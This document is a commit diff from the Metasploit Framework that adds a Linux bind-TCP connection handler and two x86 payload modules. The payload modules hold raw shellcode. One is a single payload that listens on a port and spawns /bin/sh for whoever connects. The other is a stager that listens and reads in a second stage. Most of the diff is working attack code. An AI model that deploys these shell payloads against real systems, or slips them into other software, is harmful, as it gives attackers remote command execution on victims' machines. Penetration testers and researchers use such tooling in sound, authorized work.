bind tcp stager/inline for linux
git-svn-id: file:///home/svn/incoming/trunk@2776 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
46c2cd2ac1
commit
cc32a21386
|
@ -117,7 +117,7 @@ module Handler
|
||||||
# The amount of time to wait for a session to come in.
|
# The amount of time to wait for a session to come in.
|
||||||
#
|
#
|
||||||
def wfs_delay
|
def wfs_delay
|
||||||
1
|
2
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
|
|
@ -0,0 +1,112 @@
|
||||||
|
module Msf
|
||||||
|
module Handler
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# BindTcp
|
||||||
|
# -------
|
||||||
|
#
|
||||||
|
# This module implements the Bind TCP handler. This means that
|
||||||
|
# it will attempt to connect to a remote host on a given port for a period of
|
||||||
|
# time (typically the duration of an exploit) to see if a the payload has
|
||||||
|
# started listening. This can tend to be rather verbose in terms of traffic
|
||||||
|
# and in general it is preferable to use reverse payloads.
|
||||||
|
#
|
||||||
|
###
|
||||||
|
module BindTcp
|
||||||
|
|
||||||
|
include Msf::Handler
|
||||||
|
|
||||||
|
def self.handler_type
|
||||||
|
return "bind_tcp"
|
||||||
|
end
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RHOST,
|
||||||
|
Opt::LPORT(4444)
|
||||||
|
], Msf::Handler::BindTcp)
|
||||||
|
|
||||||
|
self.conn_threads = []
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# No setup to speak of
|
||||||
|
#
|
||||||
|
def setup_handler
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Kills off the connection threads if there are any hanging around.
|
||||||
|
#
|
||||||
|
def cleanup_handler
|
||||||
|
# Kill any remaining handle_connection threads that might
|
||||||
|
# be hanging around
|
||||||
|
conn_threads.each { |thr|
|
||||||
|
thr.kill
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Starts monitoring for an outbound connection to become established.
|
||||||
|
#
|
||||||
|
def start_handler
|
||||||
|
listener_thread = Thread.new {
|
||||||
|
client = nil
|
||||||
|
|
||||||
|
print_status("Started bind handler")
|
||||||
|
|
||||||
|
# Keep trying to connect
|
||||||
|
callcc { |ctx|
|
||||||
|
while true
|
||||||
|
begin
|
||||||
|
client = Rex::Socket::Tcp.create(
|
||||||
|
'PeerHost' => datastore['RHOST'],
|
||||||
|
'PeerPort' => datastore['LPORT'].to_i,
|
||||||
|
'Comm' => comm)
|
||||||
|
rescue Rex::ConnectionRefused
|
||||||
|
# Connection refused is a-okay
|
||||||
|
rescue
|
||||||
|
wlog("Exception caught in bind handler: #{$!}")
|
||||||
|
end
|
||||||
|
|
||||||
|
ctx.call if (client)
|
||||||
|
|
||||||
|
# Wait a second before trying again
|
||||||
|
Rex::ThreadSafe.sleep(0.5)
|
||||||
|
end
|
||||||
|
}
|
||||||
|
|
||||||
|
# Valid client connection?
|
||||||
|
if (client)
|
||||||
|
# Start a new thread and pass the client connection
|
||||||
|
# as the input and output pipe. Client's are expected
|
||||||
|
# to implement the Stream interface.
|
||||||
|
conn_threads << Thread.new {
|
||||||
|
begin
|
||||||
|
handle_connection(client)
|
||||||
|
rescue
|
||||||
|
elog("Exception raised from BindTcp.handle_connection: #{$!}")
|
||||||
|
end
|
||||||
|
}
|
||||||
|
end
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Nothing to speak of.
|
||||||
|
#
|
||||||
|
def stop_handler
|
||||||
|
end
|
||||||
|
|
||||||
|
protected
|
||||||
|
|
||||||
|
attr_accessor :conn_threads
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
|
@ -23,6 +23,13 @@ class Rex::Socket::Tcp < Rex::Socket
|
||||||
#
|
#
|
||||||
##
|
##
|
||||||
|
|
||||||
|
#
|
||||||
|
# Creates the client using the supplied hash
|
||||||
|
#
|
||||||
|
def self.create(hash)
|
||||||
|
self.create_param(Rex::Socket::Parameters.from_hash(hash))
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Wrapper around the base socket class' creation method that automatically
|
# Wrapper around the base socket class' creation method that automatically
|
||||||
# sets the parameter's protocol to TCP
|
# sets the parameter's protocol to TCP
|
||||||
|
|
|
@ -0,0 +1,44 @@
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/handler/bind_tcp'
|
||||||
|
require 'msf/base/sessions/command_shell'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
module Payloads
|
||||||
|
module Singles
|
||||||
|
module Linux
|
||||||
|
module X86
|
||||||
|
|
||||||
|
module ShellBindTcp
|
||||||
|
|
||||||
|
include Msf::Payload::Single
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'Linux Command Shell, Bind TCP Inline',
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'Description' => 'Listen for a connection and spawn a command shell',
|
||||||
|
'Author' => [ 'skape', 'vlad902' ],
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
'Handler' => Msf::Handler::BindTcp,
|
||||||
|
'Session' => Msf::Sessions::CommandShell,
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Offsets' =>
|
||||||
|
{
|
||||||
|
'LPORT' => [ 0x14, 'n' ],
|
||||||
|
},
|
||||||
|
'Payload' =>
|
||||||
|
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
|
||||||
|
"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
|
||||||
|
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
|
||||||
|
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" +
|
||||||
|
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +
|
||||||
|
"\x89\xe1\xcd\x80"
|
||||||
|
}
|
||||||
|
))
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end end end end end
|
|
@ -8,7 +8,7 @@ module Singles
|
||||||
module Linux
|
module Linux
|
||||||
module X86
|
module X86
|
||||||
|
|
||||||
module Shell
|
module ShellReverseTcp
|
||||||
|
|
||||||
include Msf::Payload::Single
|
include Msf::Payload::Single
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,48 @@
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/handler/bind_tcp'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
module Payloads
|
||||||
|
module Stagers
|
||||||
|
module Linux
|
||||||
|
module X86
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# BindTcp
|
||||||
|
# -------
|
||||||
|
#
|
||||||
|
# Linux bind TCP stager.
|
||||||
|
#
|
||||||
|
###
|
||||||
|
module BindTcp
|
||||||
|
|
||||||
|
include Msf::Payload::Stager
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'Bind TCP Stager',
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'Description' => 'Listen for a connection',
|
||||||
|
'Author' => 'skape',
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
'Handler' => Msf::Handler::BindTcp,
|
||||||
|
'Stager' =>
|
||||||
|
{
|
||||||
|
'Offsets' =>
|
||||||
|
{
|
||||||
|
'LPORT' => [ 0x14, 'n' ],
|
||||||
|
},
|
||||||
|
'Payload' =>
|
||||||
|
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
|
||||||
|
"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
|
||||||
|
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
|
||||||
|
"\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"
|
||||||
|
}
|
||||||
|
))
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end end end end end
|
Loading…
Reference in New Issue